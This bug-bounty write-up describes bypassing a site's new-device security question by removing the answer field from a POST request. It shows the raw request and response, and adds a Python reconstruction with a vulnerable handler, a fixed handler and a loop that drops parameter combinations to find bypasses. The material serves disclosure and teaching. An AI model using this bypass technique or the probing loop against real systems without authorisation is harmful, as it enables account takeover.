Device Authorization Bypass!

HassanKhanYusufzai
Sep 25, 2017 · 3 min read

Hello everyone, this is Hassan Khan Yusufzai and I would like to share one of my findings. About two months ago I got a private invite on Bugcrowd. To respect the program's privacy, let's call it "Private.com".

When I was pentesting the application, I first went through its functionality. The feature that caught my attention was the device check: when you log in from a trusted device you are not prompted for the secret security question, but when you log in from an untrusted (new) device you are redirected to Private.com/device-authorization. I looked for the common ways to bypass this, such as brute-forcing the answer, but the endpoint was rate limited. I tested the application for a whole day and could not find any way past the device authentication. I had promised myself that I would bypass it ;) but nothing worked and it just wore me out :/. I left that target and started hunting on some other sites.

After two days I thought I would give Private.com another shot. I looked at the POST request again and suddenly thought: why not try removing a parameter along with its value? The POST request looked like this.

Request:

POST /device-authorization HTTP/1.1
Host: private.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json;charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: https://www.private.com/device-authorization
Content-Length: 57
Cookie: SNIP
Connection: close

{"deviceAuth[remember]":true,"deviceAuth[answer]":"test"}

What I did next was simply remove "deviceAuth[answer]":"test" from the POST data and send the request with only {"deviceAuth[remember]":true}.

The response I got was something like this:

Response:

HTTP/1.1 200 OK
Date: Mon, 25 Sep 2017 20:52:59 GMT
Content-Type: application/json
Content-Length: 47
Connection: close
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Set-Cookie:
Set-Cookie:
X-NewRelic-App-Data:
Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
X-Content-Type-Options: nosniff

{"Success":true}

And I was redirected to the /settings page of my profile :D You know what's next? Bounty :P So just by removing the parameter and its value I was able to bypass device authorization. In other words, the server apparently only validated the security answer when the parameter was present, so a missing answer was treated as nothing to check rather than as a failed check.

The issue was fixed within a day and the analyst stated:

Nice find!

Thank you for reporting this vulnerability to us and providing a very detailed report.
We have applied a fix, can you help verify if the issue has been resolved, so we can move the ticket to closed. Thank you very much!

Tip:

Don't forget to try appending and removing parameters when you are trying to bypass something. A check that only runs when its input is present can be skipped by leaving that input out.
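As an added example (not code from the original write-up or from the affected program), here is a Python reconstruction of the failure mode described above together with the parameter-removal tip. The handler names, the expected security answer and the request body are assumptions; only the body's shape is copied from the request shown earlier. The generator goes a bit beyond the single removal in the post: it tries every combination of dropped keys, so the same loop also catches checks that skip when two inputs are both absent.

```python
import hmac
import itertools
import json

# Constructed stand-in for server-side state: the security answer that the
# new-device check is supposed to verify (hypothetical value).
EXPECTED_ANSWER = "my-first-pet"


def vulnerable_device_auth(body: dict) -> dict:
    """Handler shaped like the one the write-up describes (reconstructed, not the program's code).

    The bug: the answer is only validated when the client sends it. A request
    without "deviceAuth[answer]" never reaches the comparison and falls through
    to success.
    """
    answer = body.get("deviceAuth[answer]")
    if answer is not None and answer != EXPECTED_ANSWER:
        return {"Success": False}
    return {"Success": True, "remember": bool(body.get("deviceAuth[remember]"))}


def hardened_device_auth(body: dict) -> dict:
    """Fixed handler: the answer is a required string and is compared in constant time."""
    answer = body.get("deviceAuth[answer]")
    if not isinstance(answer, str):
        # A missing or wrong-typed answer is a failed check, not a skipped one.
        return {"Success": False}
    if not hmac.compare_digest(answer.encode(), EXPECTED_ANSWER.encode()):
        return {"Success": False}
    return {"Success": True, "remember": bool(body.get("deviceAuth[remember]"))}


def parameter_removal_variants(body: dict):
    """Yield (dropped_keys, variant_body) for every non-empty set of keys removed from body.

    This is the "remove the parameter and its value" tip turned into a generator
    that a request loop can consume.
    """
    keys = list(body)
    for n in range(1, len(keys) + 1):
        for dropped in itertools.combinations(keys, n):
            yield dropped, {k: v for k, v in body.items() if k not in dropped}


def find_bypasses(handler, body: dict) -> list:
    """Return the key sets whose removal makes handler accept a body with a wrong answer."""
    hits = []
    for dropped, variant in parameter_removal_variants(body):
        if handler(variant).get("Success"):
            hits.append(dropped)
    return hits


# Constructed request body: same shape as the captured request, with a wrong answer.
ORIGINAL_BODY = json.loads('{"deviceAuth[remember]": true, "deviceAuth[answer]": "test"}')

if __name__ == "__main__":
    print("vulnerable handler bypassed by dropping:", find_bypasses(vulnerable_device_auth, ORIGINAL_BODY))
    print("hardened handler bypassed by dropping:  ", find_bypasses(hardened_device_auth, ORIGINAL_BODY))
```

Run against the vulnerable handler, the loop reports that dropping "deviceAuth[answer]" (alone or together with "deviceAuth[remember]") yields Success: true; against the hardened handler it reports nothing, because absence of the answer is handled the same way as a wrong answer. In a real engagement the handler call would be replaced by an HTTP request to the endpoint, which is also where the rate limit mentioned above will matter.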

I hope you guys learned something new :)

Thanks for reading,

Regards,

Hassan Khan Yusufzai

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Written by HassanKhanYusufzai

Web Penetration Tester & Security Analyst, acknowledged by top companies including Google, Microsoft, Twitter, eBay, Sony and many others.
